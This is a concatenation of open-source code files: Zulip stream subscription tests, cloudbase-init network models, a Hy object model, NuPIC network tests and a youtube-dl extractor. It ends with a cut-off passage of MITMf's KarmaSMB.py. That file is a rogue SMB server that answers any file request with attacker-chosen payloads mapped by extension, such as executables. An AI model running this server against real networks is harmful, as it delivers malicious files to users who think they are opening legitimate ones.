if len(self.streams) < 2:
            self.fail() # necessary for full test coverage
streams_to_remove = self.streams[1:]
not_subbed = []
for stream in Stream.objects.all():
            if stream.name not in self.streams:
not_subbed.append(stream.name)
random.shuffle(not_subbed)
self.assertNotEqual(len(not_subbed), 0) # necessary for full test coverage
try_to_remove = not_subbed[:3] # attempt to remove up to 3 streams not already subbed to
streams_to_remove.extend(try_to_remove)
self.helper_check_subs_before_and_after_remove(streams_to_remove,
{"removed": self.streams[1:], "not_subscribed": try_to_remove},
self.test_email, [self.streams[0]])
def test_subscriptions_remove_fake_stream(self):
"""
Calling /json/subscriptions/remove on a stream that doesn't exist
should return a JSON error.
"""
random_streams = self.make_random_stream_names(self.streams)
self.assertNotEqual(len(random_streams), 0) # necessary for full test coverage
streams_to_remove = random_streams[:1] # pick only one fake stream, to make checking the error message easy
result = self.client.post("/json/subscriptions/remove",
{"subscriptions": ujson.dumps(streams_to_remove)})
self.assert_json_error(result, "Stream(s) (%s) do not exist" % (random_streams[0],))
def helper_subscriptions_exists(self, stream, exists, subscribed):
"""
A helper function that calls /json/subscriptions/exists on a stream and
verifies that the returned JSON dictionary has the exists and
subscribed values passed in as parameters. (If subscribed should not be
present, pass in None.)
"""
result = self.client.post("/json/subscriptions/exists",
{"stream": stream})
json = ujson.loads(result.content)
self.assertIn("exists", json)
self.assertEqual(json["exists"], exists)
if exists:
self.assert_json_success(result)
else:
            self.assertEqual(result.status_code, 404)
        if subscribed is not None:
self.assertIn("subscribed", json)
self.assertEqual(json["subscribed"], subscribed)
def test_successful_subscriptions_exists_subbed(self):
"""
Calling /json/subscriptions/exist on a stream to which you are subbed
should return that it exists and that you are subbed.
"""
self.assertNotEqual(len(self.streams), 0) # necessary for full test coverage
self.helper_subscriptions_exists(self.streams[0], True, True)
def test_successful_subscriptions_exists_not_subbed(self):
"""
Calling /json/subscriptions/exist on a stream to which you are not
subbed should return that it exists and that you are not subbed.
"""
all_stream_names = [stream.name for stream in Stream.objects.filter(realm=self.realm)]
streams_not_subbed = list(set(all_stream_names) - set(self.streams))
self.assertNotEqual(len(streams_not_subbed), 0) # necessary for full test coverage
self.helper_subscriptions_exists(streams_not_subbed[0], True, False)
def test_subscriptions_does_not_exist(self):
"""
Calling /json/subscriptions/exist on a stream that doesn't exist should
return that it doesn't exist.
"""
random_streams = self.make_random_stream_names(self.streams)
self.assertNotEqual(len(random_streams), 0) # necessary for full test coverage
self.helper_subscriptions_exists(random_streams[0], False, None)
def test_subscriptions_exist_invalid_name(self):
"""
Calling /json/subscriptions/exist on a stream whose name is invalid (as
defined by valid_stream_name in zerver/views.py) should return a JSON
error.
"""
# currently, the only invalid stream name is the empty string
invalid_stream_name = ""
result = self.client.post("/json/subscriptions/exists",
{"stream": invalid_stream_name})
self.assert_json_error(result, "Invalid characters in stream name")
def get_subscription(self, user_profile, stream_name):
stream = Stream.objects.get(realm=self.realm, name=stream_name)
return Subscription.objects.get(
user_profile=user_profile,
recipient__type=Recipient.STREAM,
recipient__type_id=stream.id,
)
def test_subscriptions_add_notification_default_true(self):
"""
When creating a subscription, the desktop and audible notification
settings for that stream are derived from the global notification
settings.
"""
invitee = "iago@zulip.com"
user_profile = get_user_profile_by_email(invitee)
user_profile.enable_stream_desktop_notifications = True
user_profile.enable_stream_sounds = True
user_profile.save()
        current_streams = self.get_streams(invitee)
        invite_streams = self.make_random_stream_names(current_streams)
self.assert_adding_subscriptions_for_principal(invitee, invite_streams)
subscription = self.get_subscription(user_profile, invite_streams[0])
self.assertTrue(subscription.desktop_notifications)
self.assertTrue(subscription.audible_notifications)
def test_subscriptions_add_notification_default_false(self):
"""
When creating a subscription, the desktop and audible notification
settings for that stream are derived from the global notification
settings.
"""
invitee = "iago@zulip.com"
user_profile = get_user_profile_by_email(invitee)
user_profile.enable_stream_desktop_notifications = False
user_profile.enable_stream_sounds = False
user_profile.save()
        current_streams = self.get_streams(invitee)
        invite_streams = self.make_random_stream_names(current_streams)
self.assert_adding_subscriptions_for_principal(invitee, invite_streams)
subscription = self.get_subscription(user_profile, invite_streams[0])
self.assertFalse(subscription.desktop_notifications)
self.assertFalse(subscription.audible_notifications)
class GetPublicStreamsTest(AuthedTestCase):
def test_public_streams(self):
"""
Ensure that get_public_streams successfully returns a list of streams
"""
email = 'hamlet@zulip.com'
self.login(email)
result = self.client.post("/json/get_public_streams")
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertIn("streams", json)
self.assertIsInstance(json["streams"], list)
def test_public_streams_api(self):
"""
Ensure that get_public_streams successfully returns a list of streams
"""
email = 'hamlet@zulip.com'
self.login(email)
# Check it correctly lists the user's subs with include_public=false
result = self.client.get("/api/v1/streams?include_public=false", **self.api_auth(email))
result2 = self.client.get("/api/v1/users/me/subscriptions", **self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertIn("streams", json)
self.assertIsInstance(json["streams"], list)
self.assert_json_success(result2)
json2 = ujson.loads(result2.content)
self.assertEqual(sorted([s["name"] for s in json["streams"]]),
sorted([s["name"] for s in json2["subscriptions"]]))
# Check it correctly lists all public streams with include_subscribed=false
result = self.client.get("/api/v1/streams?include_public=true&include_subscribed=false",
**self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
all_streams = [stream.name for stream in
Stream.objects.filter(realm=get_user_profile_by_email(email).realm)]
self.assertEqual(sorted(s["name"] for s in json["streams"]),
sorted(all_streams))
# Check non-superuser can't use include_all_active
result = self.client.get("/api/v1/streams?include_all_active=true",
**self.api_auth(email))
self.assertEqual(result.status_code, 400)
class InviteOnlyStreamTest(AuthedTestCase):
def test_must_be_subbed_to_send(self):
"""
If you try to send a message to an invite-only stream to which
you aren't subscribed, you'll get a 400.
"""
self.login("hamlet@zulip.com")
# Create Saxony as an invite-only stream.
self.assert_json_success(
self.common_subscribe_to_streams("hamlet@zulip.com", ["Saxony"],
invite_only=True))
email = "cordelia@zulip.com"
with self.assertRaises(JsonableError):
self.send_message(email, "Saxony", Recipient.STREAM)
def test_list_respects_invite_only_bit(self):
"""
Make sure that /api/v1/users/me/subscriptions properly returns
the invite-only bit for streams that are invite-only
"""
email = 'hamlet@zulip.com'
self.login(email)
result1 = self.common_subscribe_to_streams(email, ["Saxony"], invite_only=True)
self.assert_json_success(result1)
result2 = self.common_subscribe_to_streams(email, ["Normandy"], invite_only=False)
self.assert_json_success(result2)
result = self.client.get("/api/v1/users/me/subscriptions", **self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertIn("subscriptions", json)
for sub in json["subscriptions"]:
if sub['name'] == "Normandy":
self.assertEqual(sub['invite_only'], False, "Normandy was mistakenly marked invite-only")
if sub['name'] == "Saxony":
self.assertEqual(sub['invite_only'], True, "Saxony was not properly marked invite-only")
@slow(0.15, "lots of queries")
def test_inviteonly(self):
# Creating an invite-only stream is allowed
email = 'hamlet@zulip.com'
stream_name = "Saxony"
result = self.common_subscribe_to_streams(email, [stream_name], invite_only=True)
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertEqual(json["subscribed"], {email: [stream_name]})
self.assertEqual(json["already_subscribed"], {})
# Subscribing oneself to an invite-only stream is not allowed
email = "othello@zulip.com"
self.login(email)
result = self.common_subscribe_to_streams(email, [stream_name])
self.assert_json_error(result, 'Unable to access stream (Saxony).')
# authorization_errors_fatal=False works
email = "othello@zulip.com"
self.login(email)
result = self.common_subscribe_to_streams(email, [stream_name],
extra_post_data={'authorization_errors_fatal': ujson.dumps(False)})
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertEqual(json["unauthorized"], [stream_name])
self.assertEqual(json["subscribed"], {})
self.assertEqual(json["already_subscribed"], {})
# Inviting another user to an invite-only stream is allowed
email = 'hamlet@zulip.com'
self.login(email)
result = self.common_subscribe_to_streams(
email, [stream_name],
extra_post_data={'principals': ujson.dumps(["othello@zulip.com"])})
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertEqual(json["subscribed"], {"othello@zulip.com": [stream_name]})
self.assertEqual(json["already_subscribed"], {})
# Make sure both users are subscribed to this stream
result = self.client.get("/api/v1/streams/%s/members" % (stream_name,),
**self.api_auth(email))
self.assert_json_success(result)
json = ujson.loads(result.content)
self.assertTrue('othello@zulip.com' in json['subscribers'])
self.assertTrue('hamlet@zulip.com' in json['subscribers'])
class GetSubscribersTest(AuthedTestCase):
def setUp(self):
self.email = "hamlet@zulip.com"
self.user_profile = get_user_profile_by_email(self.email)
self.login(self.email)
def check_well_formed_result(self, result, stream_name, domain):
"""
A successful call to get_subscribers returns the list of subscribers in
the form:
{"msg": "",
"result": "success",
"subscribers": ["hamlet@zulip.com", "prospero@zulip.com"]}
"""
self.assertIn("subscribers", result)
self.assertIsInstance(result["subscribers"], list)
true_subscribers = [user_profile.email for user_profile in self.users_subscribed_to_stream(
stream_name, domain)]
self.assertItemsEqual(result["subscribers"], true_subscribers)
def make_subscriber_request(self, stream_name, email=None):
if email is None:
email = self.email
return self.client.get("/api/v1/streams/%s/members" % (stream_name,),
**self.api_auth(email))
def make_successful_subscriber_request(self, stream_name):
result = self.make_subscriber_request(stream_name)
self.assert_json_success(result)
self.check_well_formed_result(ujson.loads(result.content),
stream_name, self.user_profile.realm.domain)
def test_subscriber(self):
"""
get_subscribers returns the list of subscribers.
"""
stream_name = gather_subscriptions(self.user_profile)[0][0]['name']
self.make_successful_subscriber_request(stream_name)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_gather_subscriptions(self):
"""
        gather_subscriptions returns correct results with only 4 queries
"""
realm = Realm.objects.get(domain="zulip.com")
streams = ["stream_%s" % i for i in xrange(10)]
for stream in streams:
create_stream_if_needed(realm, stream)
users_to_subscribe = [self.email, "othello@zulip.com", "cordelia@zulip.com"]
ret = self.common_subscribe_to_streams(
self.email,
streams,
dict(principals=ujson.dumps(users_to_subscribe)))
self.assert_json_success(ret)
ret = self.common_subscribe_to_streams(
self.email,
["stream_invite_only_1"],
dict(principals=ujson.dumps(users_to_subscribe)),
invite_only=True)
self.assert_json_success(ret)
with queries_captured() as queries:
subscriptions = gather_subscriptions(self.user_profile)
self.assertTrue(len(subscriptions[0]) >= 11)
for sub in subscriptions[0]:
if not sub["name"].startswith("stream_"):
continue
self.assertTrue(len(sub["subscribers"]) == len(users_to_subscribe))
self.assert_length(queries, 4, exact=True)
@slow(0.15, "common_subscribe_to_streams is slow")
def test_gather_subscriptions_mit(self):
"""
        gather_subscriptions returns correct results with only 4 queries
"""
# Subscribe only ourself because invites are disabled on mit.edu
users_to_subscribe = ["starnine@mit.edu", "espuser@mit.edu"]
for email in users_to_subscribe:
self.subscribe_to_stream(email, "mit_stream")
ret = self.common_subscribe_to_streams(
"starnine@mit.edu",
["mit_invite_only"],
dict(principals=ujson.dumps(users_to_subscribe)),
invite_only=True)
self.assert_json_success(ret)
with queries_captured() as queries:
subscriptions = gather_subscriptions(get_user_profile_by_email("starnine@mit.edu"))
self.assertTrue(len(subscriptions[0]) >= 2)
for sub in subscriptions[0]:
if not sub["name"].startswith("mit_"):
continue
if sub["name"] == "mit_invite_only":
self.assertTrue(len(sub["subscribers"]) == len(users_to_subscribe))
else:
self.assertTrue(len(sub["subscribers"]) == 0)
self.assert_length(queries, 4, exact=True)
def test_nonsubscriber(self):
"""
Even a non-subscriber to a public stream can query a stream's membership
with get_subscribers.
"""
# Create a stream for which Hamlet is the only subscriber.
stream_name = "Saxony"
self.common_subscribe_to_streams(self.email, [stream_name])
other_email = "othello@zulip.com"
# Fetch the subscriber list as a non-member.
self.login(other_email)
self.make_successful_subscriber_request(stream_name)
def test_subscriber_private_stream(self):
"""
A subscriber to a private stream can query that stream's membership.
"""
stream_name = "Saxony"
self.common_subscribe_to_streams(self.email, [stream_name],
invite_only=True)
self.make_successful_subscriber_request(stream_name)
def test_nonsubscriber_private_stream(self):
"""
A non-subscriber to a private stream can't query that stream's membership.
"""
# Create a private stream for which Hamlet is the only subscriber.
stream_name = "NewStream"
self.common_subscribe_to_streams(self.email, [stream_name],
invite_only=True)
other_email = "othello@zulip.com"
# Try to fetch the subscriber list as a non-member.
result = self.make_subscriber_request(stream_name, email=other_email)
self.assert_json_error(result,
"Unable to retrieve subscribers for invite-only stream")
| apache-2.0 |
stackforge/cloudbase-init | cloudbaseinit/models/network.py | 1 | 2857 | # Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
LINK_TYPE_PHYSICAL = "physical"
LINK_TYPE_BOND = "bond"
LINK_TYPE_VLAN = "vlan"
# Based on: https://www.kernel.org/doc/Documentation/networking/bonding.txt
BOND_TYPE_8023AD = "802.3ad"
BOND_TYPE_BALANCE_RR = "balance-rr"
BOND_TYPE_ACTIVE_BACKUP = "active-backup"
BOND_TYPE_BALANCE_XOR = "balance-xor"
BOND_TYPE_BROADCAST = "broadcast"
BOND_TYPE_BALANCE_TLB = "balance-tlb"
BOND_TYPE_BALANCE_ALB = "balance-alb"
AVAILABLE_BOND_TYPES = [
BOND_TYPE_8023AD,
BOND_TYPE_BALANCE_RR,
BOND_TYPE_ACTIVE_BACKUP,
BOND_TYPE_BALANCE_XOR,
BOND_TYPE_BROADCAST,
BOND_TYPE_BALANCE_TLB,
BOND_TYPE_BALANCE_ALB,
]
BOND_LB_ALGO_L2 = "layer2"
BOND_LB_ALGO_L2_L3 = "layer2+3"
BOND_LB_ALGO_L3_L4 = "layer3+4"
BOND_LB_ENCAP_L2_L3 = "encap2+3"
BOND_LB_ENCAP_L3_L4 = "encap3+4"
AVAILABLE_BOND_LB_ALGORITHMS = [
BOND_LB_ALGO_L2,
BOND_LB_ALGO_L2_L3,
BOND_LB_ALGO_L3_L4,
BOND_LB_ENCAP_L2_L3,
BOND_LB_ENCAP_L3_L4,
]
BOND_LACP_RATE_SLOW = "slow"
BOND_LACP_RATE_FAST = "fast"
AVAILABLE_BOND_LACP_RATES = [
BOND_LACP_RATE_SLOW,
BOND_LACP_RATE_FAST
]
NetworkDetails = collections.namedtuple(
"NetworkDetails",
[
"name",
"mac",
"address",
"address6",
"netmask",
"netmask6",
"broadcast",
"gateway",
"gateway6",
"dnsnameservers",
]
)
NetworkDetailsV2 = collections.namedtuple(
"NetworkDetailsV2",
[
"links",
"networks",
"services"
]
)
Link = collections.namedtuple(
"Link",
[
"id",
"name",
"type",
"enabled",
"mac_address",
"mtu",
"bond",
"vlan_link",
"vlan_id"
]
)
Bond = collections.namedtuple(
"Bond",
[
"members",
"type",
"lb_algorithm",
"lacp_rate"
]
)
Network = collections.namedtuple(
"Network",
[
"link",
"address_cidr",
"dns_nameservers",
"routes",
]
)
Route = collections.namedtuple(
"Route",
[
"network_cidr",
"gateway"
]
)
NameServerService = collections.namedtuple(
"NameServerService",
[
"addresses",
"search"
]
)
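# Illustrative example (not part of the original module): a minimal sketch of
# how these namedtuples could be assembled into a v2 network configuration.
# The concrete values (interface name, MAC, CIDRs, DNS server) are assumptions.
if __name__ == "__main__":
    example_link = Link(
        id="eth0", name="eth0", type=LINK_TYPE_PHYSICAL, enabled=True,
        mac_address="00:11:22:33:44:55", mtu=1500, bond=None,
        vlan_link=None, vlan_id=None)
    example_network = Network(
        link="eth0",
        address_cidr="192.0.2.10/24",
        dns_nameservers=["192.0.2.1"],
        routes=[Route(network_cidr="0.0.0.0/0", gateway="192.0.2.1")])
    example_details = NetworkDetailsV2(
        links=[example_link], networks=[example_network], services=[])
    print(example_details.networks[0].routes[0].gateway)  # 192.0.2.1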
| apache-2.0 |
larme/hy | hy/models/__init__.py | 7 | 1687 | # Copyright (c) 2013 Paul Tagliamonte <paultag@debian.org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
class HyObject(object):
"""
Generic Hy Object model. This is helpful to inject things into all the
Hy lexing Objects at once.
"""
def replace(self, other):
if isinstance(other, HyObject):
for attr in ["start_line", "end_line",
"start_column", "end_column"]:
if not hasattr(self, attr) and hasattr(other, attr):
setattr(self, attr, getattr(other, attr))
else:
raise TypeError("Can't replace a non Hy object with a Hy object")
return self
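# Illustrative example (not part of the original module): `replace` copies
# position metadata from a source object onto objects that lack it, which is
# how line/column information survives transformations of the parse tree.
# The subclass below is a hypothetical stand-in for a real Hy model type.
if __name__ == "__main__":
    class _DemoObject(HyObject):
        pass
    source = _DemoObject()
    source.start_line, source.end_line = 3, 3
    source.start_column, source.end_column = 1, 10
    fresh = _DemoObject().replace(source)
    assert fresh.start_line == 3 and fresh.end_column == 10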
| mit |
mrcslws/nupic.research | tests/unit/frameworks/pytorch/le_sparse_net_test.py | 3 | 3282 | # Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
#
import unittest
import torch
import torch.nn
from nupic.research.frameworks.pytorch.models.le_sparse_net import LeSparseNet
class LeSparseNetTest(unittest.TestCase):
def test_default(self):
"""
Make sure we get something reasonable with default parameters and
that it runs.
"""
model = LeSparseNet()
x = torch.randn((2,) + (1, 32, 32))
self.assertGreater(len(model._modules), 2)
y = model(x)
self.assertEqual(y.size()[0], 2)
self.assertEqual(y.size()[1], 10)
def test_no_cnn(self):
"""Create a net where there are no CNN blocks."""
model = LeSparseNet(
cnn_out_channels=(),
linear_n=(100, 200),
linear_activity_percent_on=(0.1, 1.0),
linear_weight_percent_on=(1.0, 0.4),
)
self.assertGreater(len(model), 2)
for key, _ in model.named_modules():
self.assertFalse("cnn" in key)
# Run some input through it and ensure it doesn't crash
x = torch.randn((2,) + (1, 32, 32))
y = model(x)
self.assertEqual(y.size()[0], 2)
self.assertEqual(y.size()[1], 10)
def test_no_linear(self):
"""Create a net where there are no linear blocks."""
model = LeSparseNet(
cnn_out_channels=(8, ),
linear_n=(),
)
self.assertGreater(len(model), 2)
for key, _ in model.named_modules():
self.assertFalse("linear" in key)
# Run some input through it and ensure it doesn't crash
x = torch.randn((2,) + (1, 32, 32))
y = model(x)
self.assertEqual(y.size()[0], 2)
self.assertEqual(y.size()[1], 10)
def test_irregular(self):
"""Create a net where different blocks have different sparsities."""
model = LeSparseNet(
cnn_out_channels=(8, 8),
cnn_activity_percent_on=(0.1, 0.2),
cnn_weight_percent_on=(1.0, 0.2),
linear_n=(100, 200),
linear_activity_percent_on=(0.1, 1.0),
linear_weight_percent_on=(1.0, 0.4),
)
self.assertGreater(len(model), 2)
# Run some input through it and ensure it doesn't crash
x = torch.randn((2,) + (1, 32, 32))
y = model(x)
self.assertEqual(y.size()[0], 2)
self.assertEqual(y.size()[1], 10)
if __name__ == "__main__":
unittest.main()
| agpl-3.0 |
kenwang815/KodiPlugins | script.module.youtube.dl/lib/youtube_dl/extractor/keek.py | 105 | 1307 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class KeekIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?keek\.com/keek/(?P<id>\w+)'
IE_NAME = 'keek'
_TEST = {
'url': 'https://www.keek.com/keek/NODfbab',
'md5': '9b0636f8c0f7614afa4ea5e4c6e57e83',
'info_dict': {
'id': 'NODfbab',
'ext': 'mp4',
'title': 'md5:35d42050a3ece241d5ddd7fdcc6fd896',
'uploader': 'ytdl',
'uploader_id': 'eGT5bab',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
return {
'id': video_id,
'url': self._og_search_video_url(webpage),
'ext': 'mp4',
'title': self._og_search_description(webpage).strip(),
'thumbnail': self._og_search_thumbnail(webpage),
'uploader': self._search_regex(
r'data-username=(["\'])(?P<uploader>.+?)\1', webpage,
'uploader', fatal=False, group='uploader'),
'uploader_id': self._search_regex(
r'data-user-id=(["\'])(?P<uploader_id>.+?)\1', webpage,
'uploader id', fatal=False, group='uploader_id'),
}
| gpl-2.0 |
timesking/MITMf | core/servers/KarmaSMB.py | 26 | 26385 | #!/usr/bin/python
# Copyright (c) 2015 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Karma SMB
#
# Author:
# Alberto Solino (@agsolino)
# Original idea by @mubix
#
# Description:
#    The idea of this script is to answer any file read request
#    with predefined contents chosen by the extension of the
#    requested file, regardless of the sharename and/or path.
#    When this script runs without a config file, the contents of
#    the file given as pathname are sent for every request.
# If a config file is specified, format should be this way:
# <extension> = <pathname>
# for example:
# bat = /tmp/batchfile
# com = /tmp/comfile
# exe = /tmp/exefile
#
# The SMB2 support works with a caveat. If two different
# filenames at the same share are requested, the first
# one will work and the second one will not work if the request
# is performed right away. This seems related to the
# QUERY_DIRECTORY request, where we return the files available.
# In the first try, we return the file that was asked to open.
# In the second try, the client will NOT ask for another
# QUERY_DIRECTORY but will use the cached one. This time the new file
# is not there, so the client assumes it doesn't exist.
# After a few seconds, looks like the client cache is cleared and
# the operation works again. Further research is needed trying
# to avoid this from happening.
#
# SMB1 seems to be working fine on that scenario.
#    SMB1 seems to be working fine in that scenario.
# ToDo:
# [ ] A lot of testing needed under different OSes.
# I'm still not sure how reliable this approach is.
# [ ] Add support for other SMB read commands. Right now just
# covering SMB_COM_NT_CREATE_ANDX
# [ ] Disable write request, now if the client tries to copy
# a file back to us, it will overwrite the files we're
# hosting. *CAREFUL!!!*
#
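#
#  Illustrative resolution example (not from the original header): with a
#  config file containing
#      pdf = /tmp/payload.pdf
#      exe = /tmp/payload.exe
#  a client opening \\SERVER\anyshare\docs\report.pdf is served
#  /tmp/payload.pdf (extensions are matched case-insensitively), while a
#  request for an unmapped extension falls back to the default file.
#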
import sys
import os
import argparse
import logging
import ntpath
import ConfigParser
from threading import Thread
from mitmflib.impacket.examples import logger
from mitmflib.impacket import smbserver, smb, version
import mitmflib.impacket.smb3structs as smb2
from mitmflib.impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
from mitmflib.impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
STATUS_OBJECT_PATH_NOT_FOUND
from mitmflib.impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
getFileTime, queryPathInformation
class KarmaSMBServer(Thread):
def __init__(self, smb_challenge, smb_port, smb2Support = False):
Thread.__init__(self)
self.server = 0
self.defaultFile = None
self.extensions = {}
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global', 'challenge', smb_challenge.decode('hex'))
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','Logon server share')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# NETLOGON always needed
smbConfig.add_section('NETLOGON')
smbConfig.set('NETLOGON','comment','Logon server share')
smbConfig.set('NETLOGON','read only','no')
smbConfig.set('NETLOGON','share type','0')
smbConfig.set('NETLOGON','path','')
# SYSVOL always needed
smbConfig.add_section('SYSVOL')
smbConfig.set('SYSVOL','comment','')
smbConfig.set('SYSVOL','read only','no')
smbConfig.set('SYSVOL','share type','0')
smbConfig.set('SYSVOL','path','')
if smb2Support:
smbConfig.set("global", "SMB2Support", "True")
self.server = smbserver.SMBSERVER(('0.0.0.0', int(smb_port)), config_parser = smbConfig)
self.server.processConfigFile()
# Unregistering some dangerous and unwanted commands
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
self.server.unregisterSmb2Command(smb2.SMB2_WRITE)
self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)
self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)
# And the same for SMB2
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)
self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)
self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)
self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
# Now we have to register the MS-SRVS server. This specially important for
# Windows 7+ and Mavericks clients since they WONT (specially OSX)
# ask for shares using MS-RAP.
self.__srvsServer = SRVSServer()
self.__srvsServer.daemon = True
self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))
def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/'))
origFileName = os.path.basename(origPathName)
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
# 2. We call the normal findFirst2 call, but with our targetFile
searchResult, searchCount, errorCode = findFirst2(path,
targetFile,
findFirst2Parameters['InformationLevel'],
findFirst2Parameters['SearchAttributes'] )
respParameters = smb.SMBFindFirst2Response_Parameters()
endOfSearch = 1
sid = 0x80 # default SID
searchCount = 0
totalData = 0
for i in enumerate(searchResult):
#i[1].dump()
try:
# 3. And we restore the original filename requested ;)
i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)
except:
pass
data = i[1].getData()
lenData = len(data)
if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:
# We gotta stop here and continue on a find_next2
endOfSearch = 0
# Simple way to generate a fid
if len(connData['SIDs']) == 0:
sid = 1
else:
sid = connData['SIDs'].keys()[-1] + 1
# Store the remaining search results in the ConnData SID
connData['SIDs'][sid] = searchResult[i[0]:]
respParameters['LastNameOffset'] = totalData
break
else:
searchCount +=1
respData += data
totalData += lenData
respParameters['SID'] = sid
respParameters['EndOfSearch'] = endOfSearch
respParameters['SearchCount'] = searchCount
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])
ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
#ntCreateAndXParameters.dump()
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
